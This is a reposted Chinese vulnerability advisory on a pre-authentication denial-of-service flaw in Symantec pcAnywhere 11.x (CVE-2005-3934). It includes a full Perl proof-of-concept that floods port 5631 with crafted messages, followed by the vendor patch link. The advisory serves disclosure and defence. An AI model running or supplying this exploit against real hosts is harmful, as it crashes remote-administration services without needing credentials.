[转载]pcAnywhere认证拒绝服务漏洞

信息来源:绿盟科技

发布日期：2005-11-29
更新日期：2006-01-17

受影响系统：

Symantec pcAnywhere 11.5.1
Symantec pcAnywhere 11.0.1

描述：

---

BUGTRAQID: 15646
CVE(CAN) ID: CVE-2005-3934

Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。

pcAnywhere在处理特制消息的时候存在溢出漏洞，可能导致拒绝服务。由于溢出发生在认证之前，因此远程攻击者无需有效的凭据便可利用这个漏洞。

<*来源：Tal

链接：http://www.symantec.com/avcenter/security/Content/2005.11.29.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID: 15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################

use IO::Socket;

if (@ARGV<1)
{
die "usage: $0 pcanywhere_ip [port]";
}

$host=$ARGV[0];
$port=$ARGV[1] || 5631;

$|=1;

$cl1="\x00\x00\x00\x00";
$cl2="\x6F\x06\xff";
$cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
$cl4="\x6f\x62\x01\x02\x00\x00\x00";

$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp'
);

die "Could not create socket: $! \n" unless $sock;

$sock->send($cl1);
$sock->recv($buff,32768);
$sock->send($cl2 x 50);
$sock->recv($buff,32768);
$sock->send($cl3 x 50);
$sock->recv($buff,32768);
$sock->send($cl4);
$sock->recv($buff,32768);

$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock->send($str x 50);
close $sock;

建议：

---

厂商补丁：

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.symantec.com/techsupp/files/pca/index.html
http://www.symantec.com/techsupp ... cts/spca/files.html